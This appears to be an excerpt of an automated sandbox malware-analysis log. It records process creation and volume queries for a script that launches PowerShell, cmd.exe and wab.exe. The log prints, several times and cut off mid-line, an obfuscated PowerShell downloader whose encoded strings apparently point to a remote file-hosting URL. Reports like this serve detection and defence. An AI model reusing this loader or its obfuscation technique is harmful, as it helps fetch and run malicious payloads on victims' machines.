Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
